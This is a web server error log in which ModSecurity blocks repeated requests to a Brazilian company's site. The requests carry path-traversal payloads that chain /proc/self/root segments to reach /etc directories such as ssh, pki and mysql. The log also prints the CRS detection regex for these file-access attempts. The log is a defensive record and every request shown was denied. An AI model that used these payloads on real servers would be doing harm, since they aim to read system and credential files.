[Tue Mar 17 09:05:53.389682 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.241.46:60984] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDoaBJNF7axNlVR0X5kAAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:54.669116 2026] [:error] [pid 1016:tid 140411674785536] [client 74.7.241.46:60992] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDopqmL8PQht4WJFlDvAAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:55.841015 2026] [:error] [pid 1016:tid 140411641214720] [client 74.7.241.46:32768] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDo5qmL8PQht4WJFlDvQAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:57.179024 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.241.46:32776] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDpe82sZHvlq4xgHq_ogAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:58.350101 2026] [:error] [pid 11293:tid 140411548894976] [client 74.7.241.46:49094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDptCmCSWTlPouqorHygAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:05:59.610233 2026] [:error] [pid 1210:tid 140411716749056] [client 74.7.241.46:49098] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDp1KJy4A1bGlmj9BSOAAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:00.809254 2026] [:error] [pid 2325:tid 140411607643904] [client 74.7.241.46:49112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDqO82sZHvlq4xgHq_owAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:02.230406 2026] [:error] [pid 2325:tid 140411716749056] [client 74.7.241.46:49114] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDqu82sZHvlq4xgHq_pAAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:03.369690 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.46:49124] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDqweiSKl8TjouI-b_CwAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:04.375096 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.243.203:50476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDrKBJNF7axNlVR0X5oAAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:04.682010 2026] [:error] [pid 1210:tid 140411548894976] [client 74.7.241.46:49130] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDrFKJy4A1bGlmj9BSOgAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:05.853662 2026] [:error] [pid 11469:tid 140411683178240] [client 74.7.241.46:49132] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDrZDEJR9VXonE_-1KpgAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:07.189006 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.241.46:49140] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDr-82sZHvlq4xgHq_pQAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:08.401794 2026] [:error] [pid 1016:tid 140411565680384] [client 74.7.241.46:40276] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDsJqmL8PQht4WJFlDwAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:09.687678 2026] [:error] [pid 11469:tid 140411708356352] [client 74.7.241.46:40280] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDsZDEJR9VXonE_-1KsAAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:10.908984 2026] [:error] [pid 11293:tid 140411741927168] [client 74.7.241.46:40292] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDstCmCSWTlPouqorHzAAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:12.241647 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.241.46:40302] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDtNCmCSWTlPouqorHzQAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:13.387423 2026] [:error] [pid 1210:tid 140411683178240] [client 74.7.241.46:40306] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDtVKJy4A1bGlmj9BSOwAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:14.759352 2026] [:error] [pid 2325:tid 140411741927168] [client 74.7.241.46:40316] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDtu82sZHvlq4xgHq_pgAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:17.064393 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.241.46:40324] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDuQeiSKl8TjouI-b_DQAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:06:19.795375 2026] [:error] [pid 1210:tid 140411641214720] [client 74.7.241.46:36756] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDulKJy4A1bGlmj9BSPAAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
